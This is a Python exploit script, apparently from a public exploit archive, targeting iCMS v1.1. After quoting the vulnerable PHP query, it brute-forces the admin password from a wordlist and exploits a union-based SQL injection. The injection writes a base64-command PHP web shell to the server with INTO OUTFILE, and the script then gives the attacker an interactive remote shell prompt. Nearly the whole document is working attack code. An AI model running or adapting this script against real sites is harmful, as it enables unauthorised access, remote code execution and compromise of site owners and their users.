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iCMS v1.1 Admin SQLi/Bruteforce Exploit
#!/usr/bin/python # ~INFORMATION # Exploit Title: iCMS v1.1 Admin SQLi/bruteforce Exploit # Author: TecR0c # Date: 18/3/2011 # Software link: http://bit.ly/hbYy35 # Tested on: Linux bt # Version: v1.1 # [XXX]: The likelihood of this exploit being successful is low # as it requires knowledge of the web path and file privileges # however a PoC is still written ;) # ~VULNERABLE CODE: ''' 15 $id = $_GET['id']; 16 $title = NULL; 17 $text = NULL; 18 database_connect(); 19 $query = "select title,text from icmscontent where id = $id;"; 20 //echo $query; 21 $result = mysql_query($query); ''' #~EXPLOIT import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass from optparse import OptionParser from urlparse import urlparse,urljoin from urllib import urlopen from cookielib import CookieJar __AUTHOR__ ="TecR0c" __DATE__ ="18.3.2011" usage = 'Example : %s http://localhost/iCMS/ -w passwords.txt -p' % __file__ parser = OptionParser(usage=usage) parser.add_option("-p","--proxy", type="string",action="store", dest="proxy", help="HTTP Proxy <server>:<port>") parser.add_option("-u","--username", type="string",action="store", default="admin", dest="username", help="Username for login") parser.add_option("-w","--wordlist", type="string",action="store", dest="wordlist", help="file to use to bruteforce password") (options, args) = parser.parse_args() #VARS sitePath = '/var/www/iCMS/icms/' webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>' if options.proxy: print '[+] Using Proxy'+options.proxy # User Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ", "Google Chrome (Windows XP)", "Opera 9.25 (Windows Vista)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Opera/8.00 (Windows NT 5.1; U; en)"] agent = random.choice(agents) def banner(): if os.name == "posix": os.system("clear") else: os.system("cls") header = ''' |----------------------------------------| |Exploit: iCMS SQLi RCE |Author: %s |Date: %s |----------------------------------------|\n '''%(__AUTHOR__,__DATE__) for i in header: print "\b%s"%i, sys.stdout.flush() time.sleep(0.005) def proxyCheck(): if options.proxy: try: h2 = httplib.HTTPConnection(options.proxy) h2.connect() print "[+] Using Proxy Server:",options.proxy except(socket.timeout): print "[-] Proxy Timed Out\n" sys.exit(1) except(NameError): print "[-] Proxy Not Given\n" sys.exit(1) except: print "[-] Proxy Failed\n" sys.exit(1) def getProxy(): try: proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) return proxy_handler cj = CookieJar() if options.proxy: opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj)) else: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('User-agent', agent)] def loginAttempt(): try: passwordlist = open(options.wordlist,'r').readlines() print "[+] Length Of Wordlist: "+str(len(passwordlist)) except(IOError): print "[-] Error: Check Your Wordlist Path\n" sys.exit(1) for password in passwordlist: password = password.replace("\r","").replace("\n","") sys.stdout.write('\r[+] Brute-forcing password with: %s \r' % password) sys.stdout.flush() time.sleep(0.2) authenticated = login(password) if authenticated: break def login(password): webSiteUrl = url.geturl()+'login.php' postParameters = {'formlogin' : options.username,'formpass' : password} postParameters = urllib.urlencode(postParameters) try: response = opener.open(webSiteUrl, postParameters).read() except: print '\n[-] Could not connect' sys.exit() loggedIn = re.compile(r"continue to the admin") authenticated = loggedIn.search(response) if authenticated: print '\n[+] logged in as %s' % options.username else: pass return authenticated def performSQLi(): webSiteUrl = url.geturl()+"/admin/item_detail.php?id=1+union+select+'ph33r',user()" try: response = opener.open(webSiteUrl).read() except: print '\n[-] Failed' root = re.compile("root") rootuser = root.search(response) if rootuser: print '[+] I smell ROOT :p~' webSiteUrl = url.geturl()+\ "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\ +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'" opener.open(webSiteUrl) print '[+] Wrote WEBSHELL !' else: print '\n[-] Could not gain access' sys.exit() def postRequestWebShell(encodedCommand): webSiteUrl = url.geturl()+'.webshell.php' commandToExecute = [ ('cmd',encodedCommand)] cmdData = urllib.urlencode(commandToExecute) try: response = opener.open(webSiteUrl, cmdData).read() except: print '[-] Failed' sys.exit() return response def clean(response): patFinder = re.compile('TECR0CSHELL(.*)LLEHSC0RCET',re.DOTALL) shell = patFinder.search(response) response = shell.group(1) return response def commandLine(): commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc) while True: try: command = raw_input(commandLine) encodedCommand = base64.b64encode(command) response = postRequestWebShell(encodedCommand) response = clean(response) print response except KeyboardInterrupt: encodedCommand = base64.b64encode('rm .webshell.php') postRequestWebShell(encodedCommand) print "\n[!] Removed .webshell.php\n" sys.exit() if "__main__" == __name__: banner() try: url=urlparse(args[0]) except: parser.print_help() sys.exit() getProxy() loginAttempt() performSQLi() commandLine() # 0day.today [2024-12-23] #